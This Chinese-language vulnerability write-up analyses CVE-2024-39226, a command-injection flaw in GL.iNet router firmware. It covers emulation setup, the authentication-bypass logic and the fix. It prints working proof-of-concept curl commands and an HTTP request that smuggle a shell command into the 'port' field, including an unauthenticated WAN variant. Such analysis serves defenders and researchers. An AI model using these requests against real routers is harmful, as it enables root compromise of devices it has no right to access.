CVE-2024-39226 GL-iNet 路由器RCE漏洞

基本信息

漏洞影响:GL.iNet AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11版本、MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16版本、XE300 v4.3.16版本、E750 v4.3.12版本、AP1300/S1300 v4.3.13版本和 XE3000/X3000 v4.4版本

漏洞类型:未授权RCE

漏洞描述:可利用此漏洞通过 s2s API 传递恶意 shell 命令来操纵路由器

漏洞组件:/usr/lib/oui-httpd/rpc/s2s.so

漏洞分析

本文分析固件版本:GL-AX1800 Flint 4.5.16

固件解包后,根据漏洞公开信息,定位到/usr/lib/oui-httpd/rpc/s2s.so

漏洞原因是获取用户传来的port键值,没有进行严格过滤直接进行字符串拼接传递给system函数,造成命令执行漏洞

img

环境搭建

启动qemu

1
2
3
sudo tunctl -t top0 -u root
sudo ifconfig top0 192.168.10.1/24 up
sudo qemu-system-arm -M vexpress-a9 -cpu cortex-a15 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic

配置IP

1
ifconfig eth0 192.168.10.2/24

上传文件系统

1
2
3
4
5
rm -rf ~/.ssh/known_hosts

scp -r squashfs-root.tar.gz root@192.168.10.2:/root

scp -r -oHostKeyAlgorithms=+ssh-dss squashfs-root.tar.gz root@192.168.10.2:/root

配置挂载

1
2
mount -o bind /dev ./squashfs-root/dev
mount -t proc /proc ./squashfs-root/proc/

进入shell

1
chroot ./squashfs-root/ sh

启动服务

1
2
3
4
5
6
7
mkdir -p /var/log/nginx
mkdir -p /var/lib/nginx/body
mkdir -p /var/run
/etc/uci-defaults/80_nginx-oui
/usr/sbin/nginx -c /etc/nginx/nginx.conf -g 'daemon off;'
/etc/uci-defaults/network_gl
/etc/init.d/boot boot

img

漏洞利用

公开poc

1
curl -H 'glinet: 1' 127.0.0.1/rpc -d '{"method":"call", "params":["", "s2s", "enable_echo_server", {"port": "7 $(touch /root/test)"}]}'

根据 Poc 可知请求的路径是rpc ,在 /etc/nginx 下的 nginx 配置文件中查找 rpc 相关信息。

/etc/nginx/conf.d/gl.conf 找到请求 rpc 路径的处理方法

img

跟进/usr/share/gl-ngx/oui-rpc.lua 根据poc信息定位到rpc_method_call函数

解析参数个数和参数类型是否符合要求

img

调用rpc.is_no_authrpc.access鉴权,调用rpc.call处理数据

img

跟进rpc.is_no_auth函数,明显访问路径不是未授权接口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
cat etc/config/oui-httpd
config oui-httpd 'main'
# 0: no security rule
# 1: generic security rule
option security_rule 1
option max_login_fail 10
option login_fail_wait 600

config no-auth-methods
option object ui
list method get_lang
list method load_locales
list method check_initialized
list method init

继续跟进rpc.access函数,当在局域网之内并且请求头含有glinet时,不鉴权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
M.session = function()
local session = ubus.call("gl-session", "session", { sid = ngx.ctx.sid })

local __oui_session = {
is_local = ngx.var.remote_addr == "127.0.0.1" or ngx.var.remote_addr == "::1",
remote_addr = ngx.var.remote_addr,
remote_port = ngx.var.remote_port
}

if not session then return __oui_session end

utils.update_ngx_session("/tmp/gl_token_" .. ngx.ctx.sid)

session.remote_addr = ngx.var.remote_addr
session.remote_port = ngx.var.remote_port

return session
end

M.access = function(scope, entry, need)
local headers = ngx.req.get_headers()
local s = M.session()
local aclgroup = s.aclgroup

if s.is_local and headers["glinet"] then
return true
end

-- The admin acl group is always allowed
if aclgroup == "root" then return true end

if not aclgroup or aclgroup == "" then return false end

local perm = db.get_perm(aclgroup, scope, entry)

if not need then return false end

if need == "r" then
return perm:find("[r,w]") ~= nil
else
return perm:find(need) ~= nil
end
end

不进行鉴权后,就到了跟进rpc.call函数,在/usr/lib/oui-httpd/rpc/目录中,判断文件是否存在,存在则调用glc_call函数

img

跟进glc_call函数,向/cgi-bin/glc文件发送一个post请求

img

分析/cgi-bin/glc文件,调用s2s.so库文件的enable_echo_server函数触发漏洞

img

Poc

局域网poc

1
2
3
4
5
6
7
8
9
10
11
12
curl -H 'glinet: 1' 127.0.0.1/rpc -d '{"method":"call", "params":["", "s2s", "enable_echo_server", {"port": "7 $(touch /root/test)"}]}'

数据包形式:
POST /rpc HTTP/1.1
Host: 127.0.0.1
User-Agent: curl/7.x.x
Accept: */*
Content-Type: application/x-www-form-urlencoded
glinet: 1
Content-Length: 102

{"method":"call", "params":["", "s2s", "enable_echo_server", {"port": "7 $(touch /root/test)"}]}

广域网poc

直接请求 /cgi-bin/glc 路径,将会调用 glc_call 函数。glc_call 函数会向另一个内部路径(/cgi-bin/glc)发起一个内部 HTTP POST 请求,并传递方法名称、参数等信息。执行 call 方法并且跳过之前的权限校验,修改 POC 尝试远程利用

1
curl http://192.168.10.2/cgi-bin/glc -d '{"object":"s2s","method":"enable_echo_server","args":{"port":"7 $(touch /root/test2024)"}}'

补丁分析

对post键值进行逐字符判断,保证字符串一定是数字

img

参考链接

固件下载:https://dl.gl-inet.cn/release/router/release/ax1800/4.5.16

漏洞分析:

https://bbs.kanxue.com/thread-283585.htm#msg_header_h2_3

https://www.iotsec-zone.com/article/477

https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/s2s%20interface%20shell%20injection.md

https://www.freebuf.com/articles/web/410443.html